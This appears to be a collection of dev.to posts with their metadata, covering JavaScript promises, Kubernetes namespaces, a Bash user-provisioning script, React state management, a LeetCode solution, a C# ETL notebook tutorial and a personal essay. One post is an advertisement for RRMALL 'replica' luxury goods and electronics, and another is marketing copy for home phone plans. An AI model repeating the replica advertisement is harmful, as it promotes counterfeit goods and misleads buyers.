```js async function fetchDataWithTimeoutAsync() { const fetchPromise = fetch("https://jsonplaceholder.typicode.com/comments"); const timeoutPromise = new Promise((_, reject) => setTimeout(() => reject(new Error("Request timed out")), 5000)); try { const response = await Promise.race([fetchPromise, timeoutPromise]); const data = await response.json(); return data; } catch (error) { console.error("Failed to fetch or timeout reached:", error); } return null; } const data = await fetchDataWithTimeoutAsync(); console.log("Comments received:", data); ``` ### Promise.allSettled You can use the `Promise.allSettled` function to wait for all the promises to complete, regardless of whether they resolve or reject. It returns a promise that resolves after all the given promises have either resolved or rejected, and it resolves to an array of objects, each describing the outcome of the corresponding promise. ```js async function fetchMultipleResourcesAsync() { const urls = [ "https://jsonplaceholder.typicode.com/posts", "https://jsonplaceholder.typicode.com/comments", "https://jsonplaceholder.typicode.com/todos" ]; try { const promises = urls.map(url => fetch(url)); const results = await Promise.allSettled(promises); const data = results.map((result, index) => { if (result.status === "fulfilled") { console.log(`Promise ${index} fulfilled with data:`); return result.value; // Collecting fulfilled results } else { console.error(`Promise ${index} rejected with reason:`, result.reason); return null; // You might want to return null or a default object } }); return data; } catch (error) { console.error("Error fetching one or more resources:", error); } return null; } const data = await fetchMultipleResourcesAsync(); console.log("Posts, comments, todos:", data); ``` ## Awaiting Thenable Objects In JavaScript, a **thenable** is an object or function that defines a `then` method. This method behaves similarly to the `then` method found in native promises. 
This way, `async/await` can handle these objects just like regular promises. For example: ```js class Thenable { then(resolve, reject) { setTimeout(() => resolve("Task completed"), 1000); } } const result = await new Thenable(); console.log(result); ``` Thenable objects can be useful for integrating with systems that don't use native promises but have promise-like behavior. However, thenable objects can introduce confusion to the source code as their behavior is not straightforward. Native promises are preferable due to their comprehensive feature set and better integration with the JavaScript ecosystem. > **_On my website: [antondevtips.com](https://antondevtips.com/blog/mastering-async-await-in-javascript-for-asynchronous-programming?utm_source=devto&utm_medium=social&utm_campaign=02_07_24) I already have JavaScript blog posts._** > **_[Subscribe](https://antondevtips.com/#subscribe) as more are coming._**
antonmartyniuk
1,909,100
Understanding Kubernetes Namespaces: Isolation, Connectivity, and Practical Use Cases
Introduction Welcome back to the blog series on Certified Kubernetes Administrator (CKA)...
0
2024-07-02T16:17:40
https://dev.to/jensen1806/understanding-kubernetes-namespaces-isolation-connectivity-and-practical-use-cases-45h4
kubernetes, docker, containers, namespaces
### Introduction Welcome back to the blog series on Certified Kubernetes Administrator (CKA) preparation. In today's post, we'll delve into the concept of namespaces in Kubernetes. We'll explore why namespaces are essential, how they provide isolation within a cluster, and perform hands-on tasks to demonstrate connectivity between services across different namespaces. Let's get started! ### What are Namespaces and Why Are They Needed? Namespaces in Kubernetes provide an additional layer of isolation within a cluster. They allow you to separate objects and resources, making management and organization easier. By default, if you don't specify a namespace, the resource is created in the default namespace. Kubernetes itself creates several namespaces, such as kube-system, which hosts control plane components, ensuring critical resources are isolated and protected from accidental modifications. #### Practical Benefits of Using Namespaces 1. **Isolation**: By separating resources into different namespaces, you can avoid accidental deletions or modifications. For instance, if you intend to delete a pod in the test namespace, you won’t mistakenly delete a pod in the prod namespace. 2. **Resource Management**: Namespaces make it easier to manage resources, especially in large clusters with multiple teams and projects. 3. **Access Control**: You can assign different permissions and roles (RBAC) to each namespace, enhancing security and governance. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/y9ulv67ek897ofh03hwb.png) ### Hands-On Task: Connectivity Between Services Across Namespaces Let's demonstrate how namespaces affect the connectivity between services. **Step 1: Check Existing Namespaces** Run the command to list existing namespaces: ``` kubectl get namespaces ``` You'll see namespaces like default, kube-system, kube-public, and kube-node-lease. 
**Step 2: Create a New Namespace** You can create a namespace using a YAML file or an imperative command. Here, we'll use a YAML file. Create a file ns.yaml: ``` apiVersion: v1 kind: Namespace metadata: name: demo ``` Apply the file: ``` kubectl apply -f ns.yaml ``` Alternatively, you can use the command: ``` kubectl create namespace demo ``` **Step 3: Deploy Applications in Different Namespaces** Deploy an NGINX application in the demo namespace: ``` kubectl create deployment nginx-demo --image=nginx --namespace=demo ``` Deploy another NGINX application in the default namespace: ``` kubectl create deployment nginx-test --image=nginx ``` **Step 4: Expose the Deployments as Services** Expose the deployments as services: ``` kubectl expose deployment nginx-demo --port=80 --namespace=demo --name=svc-demo kubectl expose deployment nginx-test --port=80 --name=svc-test ``` **Step 5: Verify Connectivity** To check connectivity, we’ll use the pod IP addresses and service names. Get the Pod IPs: ``` kubectl get pods -o wide --namespace=demo kubectl get pods -o wide ``` **Check Connectivity via IP Address:** Exec into a pod in the demo namespace and curl the IP address of the pod in the default namespace: ``` kubectl exec -it <demo-pod-name> --namespace=demo -- sh curl <default-pod-ip> ``` Similarly, check from the default namespace to the demo namespace. **Check Connectivity via Service Name:** Exec into a pod in the demo namespace and curl the service name in the default namespace: ``` kubectl exec -it <demo-pod-name> --namespace=demo -- sh curl svc-test.default.svc.cluster.local ``` And vice versa: ``` kubectl exec -it <default-pod-name> -- sh curl svc-demo.demo.svc.cluster.local ``` ### Conclusion Namespaces in Kubernetes are crucial for resource isolation, management, and security. They allow different projects and teams to coexist within the same cluster without interfering with each other. 
Understanding and using namespaces effectively can significantly enhance your Kubernetes administration skills. I hope you found this post helpful. Stay tuned for the next part of our series, where we will dive into multi-container pods and related concepts. Happy learning! For further reference, check out the detailed YouTube video here: {% embed https://www.youtube.com/watch?v=yVLXIydlU_0 %}
jensen1806
1,909,092
Discover Perfect Quality Replica Products at Affordable Prices with RRMALL
In today's market, finding high-quality products at reasonable prices can be difficult. RRMALL bridges this gap, offering replica products that guarantee the best quality and lowest prices at wholesale...
0
2024-07-02T15:59:46
https://dev.to/replicaproducts/discover-perfect-quality-replica-products-at-affordable-prices-with-rrmall-284i
In today's market, finding high-quality products at reasonable prices can be difficult. RRMALL bridges this gap by offering replica products at wholesale prices, guaranteeing the best quality and the lowest prices. Through direct factory deals, RRMALL ensures its customers get the best quality at the lowest prices. Let's take a closer look at why RRMALL is the top destination for replica products. **Exceptional Quality at Wholesale Prices** RRMALL offers customers replica products that mirror the originals in every respect. From materials to craftsmanship, every product is designed to meet high standards, ensuring durability and aesthetic appeal. Direct factory deals eliminate middlemen, reducing costs and allowing RRMALL to offer outstanding prices. **A Wide Range of Products** Whether you're looking for fashion accessories, electronics, or household goods, RRMALL offers a comprehensive selection of [replica](https://rrmall02.com) products to choose from. Each product line is carefully curated to include the latest trends and timeless classics, so there is something for everyone. **Fashion Accessories** From designer handbags and watches to stylish jewelry and sunglasses, RRMALL offers a wide range of fashion accessories that are nearly indistinguishable from luxury goods. Each item is crafted with meticulous care, letting you enjoy a luxury aesthetic at an affordable price. **Electronics** Staying up to date in the fast-moving world of technology can be expensive. RRMALL offers high-quality replica electronics that deliver performance and style at affordable prices. From smartphones to smartwatches, get the latest gadgets at economical prices. **Household Goods** Upgrade your living space with RRMALL's wide range of household goods. From sleek decor to functional kitchenware, each product combines quality and value, making it easy to create a stylish home environment. **Direct Factory Deals** One of the key advantages of shopping at RRMALL is its direct factory deals. By sourcing products directly from manufacturers, customers get the best prices without compromising on quality. This direct approach also improves quality control, ensuring each product meets RRMALL's high standards. **Customer Satisfaction Guaranteed** At RRMALL, customer satisfaction comes first. Every product undergoes rigorous quality inspection before reaching the customer. In addition, RRMALL offers a convenient return policy so customers can shop with confidence. **Why Choose RRMALL** Choosing RRMALL means choosing quality, value, and reliability. With its wide product range, direct factory deals, and commitment to customer satisfaction, RRMALL has established itself as a trusted name in the replica product market. Whether you're shopping for yourself or starting a retail business, RRMALL offers the best value. **Start Shopping Now** Ready to discover perfect-quality replica products at affordable prices? Visit RRMALL today and explore its wide range of products. With RRMALL, enjoying luxury and quality without the hefty price tag has never been easier.
replicaproducts
1,909,099
DevOps Beginnings: Mastering Python and Golang!
🌟 Exciting News! 🌟 I'm thrilled to share that I've started my journey into the world of DevOps! As a...
0
2024-07-02T16:15:23
https://dev.to/upendra_verma_74415c5652e/devops-beginnings-mastering-python-and-golang-l0d
python, devops, go, productivity
🌟 Exciting News! 🌟 I'm thrilled to share that I've started my journey into the world of DevOps! As a first step, I'm diving deep into learning the basics of Python and Golang. 🚀 I'm looking forward to connecting with fellow developers and DevOps professionals to exchange knowledge and experiences. Let's grow and innovate together! #DevOps #Python #Golang #DevCommunity #TechJourney #ContinuousLearning #TechGrowth #Programming
upendra_verma_74415c5652e
1,909,097
Automating User and Group Management on Linux with Bash
Managing user accounts and groups is a fundamental aspect of system administration. In dynamic...
0
2024-07-02T16:12:22
https://dev.to/christian_ochenehipeter_/automating-user-and-group-management-on-linux-with-bash-10cb
Managing user accounts and groups is a fundamental aspect of system administration. In dynamic environments, such as those in software development companies, the ability to automate this process can save time and reduce errors. This article explains a Bash script designed to automate the creation of user accounts and groups based on a predefined list, ensuring each user has a secure, randomly generated password. Understanding the Script The script create_users.sh takes a text file as input, where each line specifies a username and associated groups, separated by a semicolon. It performs the following actions: User and Group Creation: For each line in the input file, the script creates a user and a personal group with the same name. It also adds the user to specified groups, creating those groups if they don't already exist. Password Management: It generates a secure, random password for each user, sets it, and stores it in a secure file, ensuring that only the root user can access it. Logging: All actions are logged to /var/log/user_management.log, providing a clear audit trail. Why This Approach? This script emphasizes security and accountability. By generating random passwords and securing the password file, it ensures that user accounts are protected from the outset. Logging every action allows system administrators to track changes and troubleshoot issues. Deployment and Usage To use the script, simply run it as root and pass the path to your input file as an argument: sudo bash create_users.sh usernames.txt Ensure that your input file follows the format username;group1,group2. Learn More For those interested in further automating and managing Linux systems, the HNG Internship (https://hng.tech/internship) offers valuable resources and opportunities. Whether you're looking to hire tech talent or enhance your skills, the HNG Hire platform (https://hng.tech/hire) and premium courses provide a wealth of information and support. 
Conclusion Automating user and group management not only streamlines system administration tasks but also enhances security and efficiency. By leveraging simple yet powerful Bash scripts, sysadmins can ensure their systems are well-organized and secure.
christian_ochenehipeter_
1,909,095
The Difference Between indexOf and findIndex in JavaScript
indexOf is a method available for both arrays and strings in JavaScript, used to search for the first...
0
2024-07-02T16:06:28
https://dev.to/sbabaeizadeh/the-difference-between-indexof-and-findindex-in-javascript-42ij
webdev, javascript, programming
indexOf is a method available for both arrays and strings in JavaScript, used to search for the first occurrence of a value using strict equality ("==="). findIndex is a higher-order function specifically designed for arrays, used to search for the first element that satisfies a condition specified by a callback function. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/y7zm8m430ed3mlb7rdug.png)
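A short example (with hypothetical data) makes the contrast concrete — `indexOf` matches by strict equality, while `findIndex` evaluates a callback per element, which also makes it the right tool for arrays of objects:

```javascript
const prices = [5, 12, 8, 130, 44];

// indexOf: first element strictly equal to the value
console.log(prices.indexOf(8));    // 2
console.log(prices.indexOf("8"));  // -1 (strict equality, no type coercion)

// findIndex: first element satisfying a predicate
console.log(prices.findIndex(p => p > 10)); // 1 (12 is the first match)

// With objects, indexOf compares references, so a structurally equal
// literal is never found; findIndex can match by property instead.
const users = [{ id: 1 }, { id: 2 }];
console.log(users.indexOf({ id: 2 }));         // -1
console.log(users.findIndex(u => u.id === 2)); // 1
```

Both methods return -1 when nothing matches, so the calling code can treat their results the same way.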
sbabaeizadeh
1,898,451
Context API vs. Redux: When and Why to Use Them in React
Before starting to explore the differences and use cases of both Context API and Redux, it is...
0
2024-07-02T16:03:07
https://dev.to/zahidkhanxen/context-api-vs-redux-when-and-why-to-use-them-in-react-2c8d
Before starting to explore the differences and use cases of both the Context API and Redux, it is essential to understand why these two solutions were developed. In plain React, we pass data down from parent components to child components; the parent component is the one in which a component is rendered. For example: let's say we have a component defined in Greet.js, and this component is rendered in App.js, making App.js its parent component. If we pass a constant firstName with the value "John", it will look like this: ```jsx //App.js export const App = () => { const firstName = "John"; return ( <> <Greet name={firstName} /> <Profile name={firstName} /> </> ); } ``` ```jsx // Greet.js export const Greet = ({ name }) => { return <h1>Welcome : {name}</h1>; } ``` ```jsx // Profile.js export const Profile = ({ name }) => { return <h1>userName : {name}</h1>; } ``` The method above is known as Prop Drilling. Passing props can become inconvenient when you need to pass a prop deeply through the tree, or when many components need the same prop; in those cases prop drilling becomes complex, and we use the Context API instead. **Context API**: Context is a way to pass data through the component tree without having to pass it down manually at every level. It's beneficial for sharing data that can be considered "global" for a tree of React components, such as the current authenticated user, theme, or preferred language. There are three steps to implement the Context API: **Create a Context**: Define a context to hold the state. **Provide Context**: Wrap the top-level component with the context provider. **Consume Context**: Use the context in the child components to access the state. 
**1-Create a Context** ```jsx // UserContext.js import React, { createContext, useState } from 'react'; const UserContext = createContext(); const UserProvider = ({ children }) => { const [name, setName] = useState("John"); return ( <UserContext.Provider value={{ name }}> {children} </UserContext.Provider> ); }; export { UserContext, UserProvider }; ``` **2-Provide Context** ```jsx // App.js import React from 'react'; import { UserProvider } from './UserContext'; import Welcome from './Welcome'; import Profile from './Profile'; const App = () => { return ( <UserProvider> <div> <Welcome /> <Profile /> </div> </UserProvider> ); }; export default App; ``` **3-Consume Context** ```jsx // Welcome.js import React, { useContext } from 'react'; import { UserContext } from './UserContext'; const Welcome = () => { const { name } = useContext(UserContext); return <h1>Welcome: {name}</h1>; }; export default Welcome; ``` ```jsx // Profile.js import React, { useContext } from 'react'; import { UserContext } from './UserContext'; const Profile = () => { const { name } = useContext(UserContext); return <h1>userName: {name}</h1>; }; export default Profile; ``` Using the Context API allows data to flow anywhere in the component tree, making it a superior method for managing application state compared to prop drilling. However, as applications grow in complexity and certain side effects become challenging to manage within individual components, Redux emerges as a powerful solution. **React Redux** Redux simplifies state management by centralizing it through a global store. It not only eliminates the need for prop drilling but also provides an efficient way to handle side effects using middleware. This approach ensures that side effects, such as asynchronous data fetching or logging, are managed centrally, keeping components focused solely on UI rendering. 
Let's understand it with an example. These are the steps involved in the Redux data flow: **Create Action** : Define the action to be performed **Create Reducer** : Define how the action updates the state **Create Store** : Receives the updated state from the reducer and makes it available to any component. **1.Create Action** ```jsx // userActions.js export const setName = (name) => ({ type: 'SET_NAME', payload: name, }); ``` **2.Create Reducer** ```jsx // userReducer.js const initialState = { name: 'John', // initial state }; const userReducer = (state = initialState, action) => { switch (action.type) { case 'SET_NAME': return { ...state, name: action.payload }; default: return state; } }; export default userReducer; ``` **3.Create Store** ```jsx // store.js import { createStore } from 'redux'; import userReducer from './userReducer'; const store = createStore(userReducer); export default store; ``` Wrap your application with the Redux Provider component to make the store available to all components. ```jsx // App.js import React from 'react'; import { Provider } from 'react-redux'; import store from './store'; import Welcome from './Welcome'; import Profile from './Profile'; const App = () => { return ( <Provider store={store}> <div> <Welcome /> <Profile /> </div> </Provider> ); }; export default App; ``` Now, you can use this globally in any component by using the `useSelector` hook: ```jsx // Welcome.js import React from 'react'; import { useSelector } from 'react-redux'; const Welcome = () => { const name = useSelector(state => state.name); return <h1>Welcome: {name}</h1>; }; export default Welcome; ``` **Conclusion**: In the end, whether you choose React's Context API or Redux depends on what your application specifically requires and the particular challenges it faces.
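To make the action → reducer → store flow concrete outside React, here is a deliberately simplified, hand-rolled store sketch — `createMiniStore` is a toy stand-in for illustration, not the real Redux API — driven by the same reducer shape as `userReducer` above:

```javascript
// Toy stand-in for a Redux store (illustrative only, not the real library).
function createMiniStore(reducer) {
  let state = reducer(undefined, { type: "@@INIT" }); // compute initial state
  const listeners = [];
  return {
    getState: () => state,
    dispatch: (action) => {
      state = reducer(state, action); // the reducer produces the next state
      listeners.forEach((l) => l());  // notify subscribers (React bindings, etc.)
    },
    subscribe: (listener) => listeners.push(listener),
  };
}

// Same reducer shape as userReducer in the article
const userReducer = (state = { name: "John" }, action) => {
  switch (action.type) {
    case "SET_NAME":
      return { ...state, name: action.payload };
    default:
      return state;
  }
};

const store = createMiniStore(userReducer);
store.subscribe(() => console.log("state is now:", store.getState()));

store.dispatch({ type: "SET_NAME", payload: "Jane" });
console.log(store.getState().name); // "Jane"
```

In a React app, `useSelector` plays the role of the subscriber here: it re-renders the component whenever a dispatched action produces a new state.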
zahidkhanxen
1,909,093
User Creation Automation in Linux with a Bash Script
Introduction In the world of a SysOps engineer, one of the common tasks you will encounter...
0
2024-07-02T16:00:42
https://dev.to/clintt/user-creation-aumation-in-linux-with-a-bash-script-630
## **Introduction** In the world of a SysOps engineer, one of the common tasks you will encounter is the creation and management of users and groups. Automation helps simplify this process, making it efficient and time-saving. In this blog post, we'll go through a Bash script, create_users.sh, that automates the creation of users and groups, sets up home directories with appropriate permissions and ownership, generates random passwords for the users, and logs all actions. ### **Breaking down the script** Here is the complete script, create_users.sh, with an explanation of each section. ``` #!/bin/bash # Define the log & password file variables LOG_FILE="/var/log/user_management.log" PASSWORD_FILE="/var/secure/user_passwords.csv" # Create and set permissions for log and password files touch $LOG_FILE mkdir -p /var/secure touch $PASSWORD_FILE chmod 600 $PASSWORD_FILE # Generate a random password for a user generate_password() { tr -dc A-Za-z0-9 </dev/urandom | head -c 12 } # Check if the file is provided if [ -z "$1" ]; then echo "Usage: $0 <user_file>" exit 1 fi USER_FILE="$1" # Process each line of the user file while IFS=";" read -r username groups; do # Remove leading and trailing whitespace from username and groups username=$(echo $username | xargs) groups=$(echo $groups | xargs) # If a user does not exist, create user and personal group if ! id -u $username >/dev/null 2>&1; then useradd -m -s /bin/bash $username echo "$(date) - Created user: $username" >> $LOG_FILE # Generate a password for the user password=$(generate_password) echo "$username,$password" >> $PASSWORD_FILE echo "$username:$password" | chpasswd # Set appropriate permissions and ownership for home directory chown -R "$username:$username" "/home/$username" chmod 700 "/home/$username" # Assign the user to the specified groups if [ -n "$groups" ]; then IFS=',' read -r -a group_array <<< "$groups" for group in "${group_array[@]}"; do if ! 
getent group $group >/dev/null; then groupadd $group echo "$(date) - Created group: $group" >> $LOG_FILE fi usermod -aG $group $username echo "$(date) - Added $username to group: $group" >> $LOG_FILE done fi else echo "$(date) - User $username already exists" >> $LOG_FILE fi done < "$USER_FILE" echo "The user creation process is completed." ``` ### **Explanation** **Defining the log & password file variables:** We define the paths for the log file and the password storage file. It also ensures that a secure directory for password storage is created with the neccesary permissions. ``` LOG_FILE="/var/log/user_management.log" PASSWORD_FILE="/var/secure/user_passwords.csv" touch $LOG_FILE touch $PASSWORD_FILE chmod 600 $PASSWORD_FILE ``` **Processing the Input File:** The script reads the input file provided. Each line is expected to have a username and a list of groups separated by a semicolon. The script processes each line, removing any leading or trailing whitespace from username and groups. ``` if [ -z "$1" ]; then echo "Usage: $0 <user_file>" exit 1 fi USER_FILE="$1" while IFS=";" read -r username groups; do # Remove leading and trailing whitespace from username and groups username=$(echo $username | xargs) groups=$(echo $groups | xargs) ``` **Generating Random Passwords:** This script generates random passwords for each user using a secure method. These passwords are then stored in a directory; /var/secure/user_passwords.csv, with the neccesary file permissions set to ensure only the owner can read it. ``` generate_password() { tr -dc A-Za-z0-9 </dev/urandom | head -c 12 } ``` **Function to Create Users and Groups:** This script creates each user and their group, as well as any additional groups. If the user or group already exists, the script logs a message and skips to the next entry. It sets up home directories with appropriate permissions and ownership. ``` if ! 
id -u $username >/dev/null 2>&1; then useradd -m -s /bin/bash $username echo "$(date) - Created user: $username" >> $LOG_FILE password=$(generate_password) echo "$username,$password" >> $PASSWORD_FILE echo "$username:$password" | chpasswd chown -R "$username:$username" "/home/$username" chmod 700 "/home/$username" if [ -n "$groups" ]; then IFS=',' read -r -a group_array <<< "$groups" for group in "${group_array[@]}"; do if ! getent group $group >/dev/null; then groupadd $group echo "$(date) - Created group: $group" >> $LOG_FILE fi usermod -aG $group $username echo "$(date) - Added $username to group: $group" >> $LOG_FILE done fi ``` ## Running the Script Before executing the script, ensure it has executable permissions. You can make it executable by granting the necessary permissions using: ``` chmod +x create_users.sh ``` Run the Script with Root Privileges. ``` sudo ./create_users.sh ``` After executing the script, it will display messages confirming the creation. ## Conclusion This bash script helps automate user creation and management making the process easier and saves time. This ensures all actions are logged and passwords stored securely. To learn about this and more, check out [HNG Internship](https://hng.tech/internship) and also check out [HNG Hire](https://hng.tech/hire) for top talents.
clintt
1,909,090
An application form asked me what I feel about their value "doing what it takes". I shared a story about an old dog.
"One of our values is 'Do-What-It-Takes.' Please provide an example of a time you’ve applied this and...
0
2024-07-02T15:55:30
https://dev.to/tacodes/some-application-form-asked-me-what-i-feel-about-their-value-doing-what-it-takes-i-shared-a-story-about-an-old-dog-den
application, jobhunt, story
"One of our values is 'Do-What-It-Takes.' Please provide an example of a time you’ve applied this and what the impact was." I'm kind of tired of the rinse-and-repeat job description-focused answers. 'I always met deadlines cause I *did what it took*', 'the customers were 99.98% happy with the results', etc... They've yielded no positive results for me on my job hunt. I'm not standing out over the noise of the 999 other applications. So, I kind of just write what I feel now. If something sticks, we'll probably have that "culture fit" we're all seeking these days. Anyway, here's what I wrote in my application - majorly unedited and just blathered out. It's the story of an old dog.

____

This story is outside the realm of tech, but I see this from the perspective of "doing what it takes [to be a decent human]". Being a decent human includes things like trying to reduce pollution, inequities, and all other evils we've created... being human also includes speaking out against a group if you believe there is a wrong to be righted.

Two years ago, my roommate's dog had a small wound on his paw for about a month that wasn't going away. First, I waited for my roommate (the dog owner) to act. He did not (for several days/weeks), and the wound expanded because the poor dog kept licking it. I told the dog owner a story about a cat I had seen in a similar situation and she had to lose a leg. I told him it was important to me that the dog be cared for promptly. I suggested a dog cone so the wound could heal. I tried secretly treating the wound but was told to stop. And the dog cone suggestion was ignored. I eventually bought a dog cone, but it was never used. The wound expanded. For 18 months. I tried to wrap the wound, clean it, cone the dog while the owner was away, and gently remind the owner that the wound needed professional attention. He ignored the problem. The wound kept growing. And the dog was clearly hurt, hiding, and not in a good way.
Around this time, this dog's owner picked up a new puppy. Exacerbated by the puppy's want to play constantly, the old dog's wound took up most of the paw and he was very hurt, completely unable to use that foot. But the owner thought the old dog dealt with pain admirably. No one else had spoken up directly to the dog owner to this point. Not a single neighbor, coworker in the office, or other roommate — no one was speaking up for this dog because they didn't want to ruffle feathers. I had to 'do what it takes' to get this dog taken care of at this point. I'll confront, I'll set boundaries, I'll call the authorities if it gets to it. The direct conversation of "you need to care for your neglected dog, he needs medical attention, and you need to rethink your priorities" became a defensive confrontation. Then all of my neighbors and mutually connected friends stopped being friendly; they were no longer cordial and were more standoff-ish, even glaring at me sometimes. The dog owner's family stopped inviting me to Christmas dinners. Despite all of the negative reactions by these groups of people. Despite the resentment the dog owner still has for me. Despite the 'shunning'.... Despite all this. The old dog has been treated. The old dog is now two toes less (amputated), but he is now able to play with the puppy, he can stand on all four paws, and the old dog is also a happy dog again. I did what it took to make sure that old dog can live out the rest of his days in relative comfort.

____

Don't be afraid to speak out, speak up, don't be afraid to be the squeaky wheel when it feels like you must. You might feel alone in your fight, but you are not.
tacodes
1,909,089
350. Intersection of Two Arrays II
350. Intersection of Two Arrays II Easy Given two integer arrays nums1 and nums2, return an array...
27,523
2024-07-02T15:48:03
https://dev.to/mdarifulhaque/350-intersection-of-two-arrays-ii-3fgm
php, leetcode, algorithms, programming
350\. Intersection of Two Arrays II

Easy

Given two integer arrays `nums1` and `nums2`, return _an array of their intersection_. Each element in the result must appear as many times as it shows in both arrays, and you may return the result in **any order**.

**Example 1:**

- **Input:** nums1 = [1,2,2,1], nums2 = [2,2]
- **Output:** [2,2]

**Example 2:**

- **Input:** nums1 = [4,9,5], nums2 = [9,4,9,8,4]
- **Output:** [4,9]
- **Explanation:** [9,4] is also accepted.

**Constraints:**

- <code>1 <= nums1.length, nums2.length <= 1000</code>
- <code>0 <= nums1[i], nums2[i] <= 1000</code>

**Solution:**

```
class Solution {

    /**
     * @param Integer[] $nums1
     * @param Integer[] $nums2
     * @return Integer[]
     */
    function intersect($nums1, $nums2) {
        // Count occurrences of each element in both arrays
        $counts1 = array_count_values($nums1);
        $counts2 = array_count_values($nums2);

        $intersection = [];

        // Iterate through the first count array
        foreach ($counts1 as $num => $count) {
            // Check if the element exists in the second array
            if (isset($counts2[$num])) {
                // Find the minimum occurrence
                $minCount = min($count, $counts2[$num]);

                // Add the element to the result array, repeated $minCount times
                for ($i = 0; $i < $minCount; $i++) {
                    $intersection[] = $num;
                }
            }
        }

        return $intersection;
    }
}
```

**Contact Links**

- **[LinkedIn](https://www.linkedin.com/in/arifulhaque/)**
- **[GitHub](https://github.com/mah-shamim)**
mdarifulhaque
1,909,088
Ringing in Savings: A Guide to Home Phone Deals in the Age of Mobiles
In a world dominated by smartphones, you might be wondering if a home phone still holds value....
0
2024-07-02T15:47:24
https://dev.to/andy_wilson_783aeb2815937/ringing-in-savings-a-guide-to-home-phone-deals-in-the-age-of-mobiles-23nn
In a world dominated by smartphones, you might be wondering if a home phone still holds value. Surprisingly, for many households, a landline phone remains a reliable and cost-effective communication tool. Whether it's for business calls, keeping in touch with elderly relatives, or simply a backup option in case of emergencies, home phone deals can offer significant advantages. **Why Consider a Home Phone?** While mobile phones are undoubtedly convenient, there are several reasons why a home phone might be the right fit for you: **Crystal Clear Calls:** Landlines often boast superior sound quality compared to mobile phones, especially in areas with weak cellular reception. This can be a game-changer for important conversations where clarity is crucial. **Cost-Effectiveness:** For those who make frequent local calls, home phone plans can be significantly cheaper than relying solely on mobile minutes. **Always Connected:** Unlike smartphones that can run out of battery, a landline remains functional even during power outages, ensuring you can always stay connected during emergencies. **Dedicated Business Line:** For home-based businesses, a separate landline keeps professional and personal calls distinct. It also creates a more professional image for your clients. **Peace of Mind for Seniors:** For elderly family members who might not be comfortable with smartphones, a home phone provides a familiar and reliable way to stay connected. **Exploring Home Phone Deals** With a renewed understanding of the potential benefits, let's delve into the world of **[home phone deals](https://fastbroadbandtv.com/home-phone)**: **Landline Providers:** Traditional phone companies, cable providers, and even some internet service providers (ISPs) offer home phone plans. Shop around to compare pricing and features. **Packages and Bundles:** Many providers bundle home phone service with other offerings like internet or cable TV. 
These bundles can often be more cost-effective than standalone plans. **Contract vs. No-Contract:** Consider whether you're comfortable committing to a contract for a lower rate or prefer the flexibility of a no-contract plan with potentially higher monthly costs. **Features to Look For:** Unlimited local calling is a common feature, but consider additional options like call waiting, caller ID, voicemail, and international calling if needed. **Finding the Perfect Deal** Here are some pointers to secure the best home phone deal for your needs: **Assess Your Needs:** Determine your calling habits and desired features. Do you need unlimited local calls? International calling? Voicemail? Identifying these needs will guide your search. **Compare "Home Phone Deals":** Utilize online resources and comparison websites to research available plans from different providers in your area. **Read the Fine Print:** Understand additional fees like equipment rental charges, per-minute international rates, and any early termination fees associated with contracts. **Promotional Offers:** Look for introductory discounts or bundled packages that can offer significant savings. **Negotiate:** Although less common with landline plans, sometimes you can negotiate with providers, especially if you're bundling services.
andy_wilson_783aeb2815937
1,909,087
Unlock the Power of C# in Polyglot Notebooks
This article shows how to use C# skills in polyglot notebooks for better data management and...
0
2024-07-02T15:46:11
https://dev.to/andreaslennartz/unlock-the-power-of-c-in-polyglot-notebooks-3kj2
jupyter, csharp, etl, polyglot
This article shows how to use C# skills in polyglot notebooks for better data management and analysis.

### C# and Polyglot Notebooks

C# is a powerful programming language widely used for building a variety of applications, from web apps to complex data processing systems. Polyglot notebooks, like Jupyter notebooks, allow you to write and execute code in multiple programming languages within the same document. This makes it easier to share and collaborate on projects, especially those involving data analysis, visualization, or machine learning.

Traditionally, C# hasn't been as common in the realm of polyglot notebooks, which have been more associated with languages like Python and R. However, Microsoft has made significant improvements in recent years, making it much easier to use C# within these environments. With these advancements, we can now leverage the full power of C# for tasks that require high performance and robust tooling.

### The Use-case of ETL in a Polyglot Notebook

ETL stands for Extract, Transform, Load, and it's a process commonly used in data management to move data from one place to another, transform it into a usable format, and then load it into a database or another storage system. In polyglot notebooks, basic tasks like loading data from a CSV file are supported out-of-the-box. However, when dealing with more complex data sources such as databases or web APIs, and then transforming this data, ETL pipelines become indispensable.

We are using [ETLBox, a library designed for ETL processes in .NET environments](https://www.etlbox.net/?utm_source=devto&utm_content=polyglot), because it allows us to write ETL code in C#. By using a polyglot notebook, we can combine the flexibility of different programming languages with the power of C# for data manipulation.

### How to Create Your Own Polyglot Notebook

To create your own polyglot notebook in VS Code, follow these steps:

1. **Prerequisites**: Make sure you have Visual Studio Code (VS Code) installed on your computer. You will also need to install the Polyglot Notebooks extension to enable multi-language support within your notebook.
2. **Press** `CTRL + SHIFT + P` **to open the command dialogue**.
3. **Select** `Polyglot Notebook: Create Default Notebook`.
4. **Choose the** `.ipynb` **extension and select the** `C#` **language**.
5. **Add the following code block** to start coding in C#:

```csharp
// This is where your C# code will go
var s = "Hello, Polyglot Notebook!";
s
```

(Note the missing `;` at the end of the last line)

6. **Run the code**: This should print `Hello, Polyglot Notebook!` as output.

These steps will set up a fresh new notebook where you can start exploring Polyglot Notebooks with C#.

### Setting Up a Database Table for ETL Using C# in a Polyglot Notebook

Let's see how to set up a simple database table using C# within a polyglot notebook.

- **Install ETLBox.SqlServer Package**

Before we begin, ensure you have the ETLBox.SqlServer package installed. This package provides the necessary tools to interact with SQL Server databases using ETLBox.

```csharp
#r "nuget:ETLBox.SqlServer, 3.4.0"
```

- **Set Up Connection Credentials**

```csharp
using ETLBox;
using ETLBox.SqlServer;
using ETLBox.ControlFlow;

IConnectionManager connMan = new SqlConnectionManager("Data Source=localhost;User Id=sa;Password=YourStrong@Passw0rd;Initial Catalog=demo;TrustServerCertificate=true;");
```

Replace the connection string in the code above with your SQL Server credentials. This example assumes you are connecting to a local SQL Server instance (`localhost`), using the `sa` user with the password `YourStrong@Passw0rd`, and targeting a database named `demo`.

- **Define Table Structure**

We'll define a simple table named `Test` with three columns: `Id` (INT, identity column), `XValue` (DATETIME), and `YValue` (INT). This table will store sample data for demonstration purposes.

```csharp
var def = new TableDefinition("Test",
    new List<TableColumn>() {
        new TableColumn("Id", "INT", allowNulls: false, isIdentity: true, isPrimaryKey: true),
        new TableColumn("XValue", "DATETIME", allowNulls: false),
        new TableColumn("YValue", "INT", allowNulls: false)
    });
```

- **Create the Table**

